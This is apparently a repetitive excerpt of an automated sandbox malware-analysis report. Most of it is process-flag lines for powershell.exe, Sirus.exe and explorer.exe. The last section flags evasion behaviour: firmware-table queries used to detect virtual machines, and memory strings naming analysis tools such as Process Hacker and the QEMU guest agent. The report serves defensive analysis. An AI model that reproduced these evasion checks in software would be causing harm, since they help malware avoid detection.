      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Query firmware table information (likely to detect VMs)
      Source: C:\Users\user\AppData\Roaming\WeMod.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeSystem information queried: FirmwareTableInformation
      Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: explorer.exe, 00000045.00000002.4114240353.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
      Source: Sirus.exe, 00000007.00000002.1976423267.00000000028F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE@\^Q
      Source: Sirus.exe, 00000007.00000002.1976423267.00000000028F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE`,^Q
      Source: Sirus.exe, 00000007.00000002.1976423267.00000000028F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE
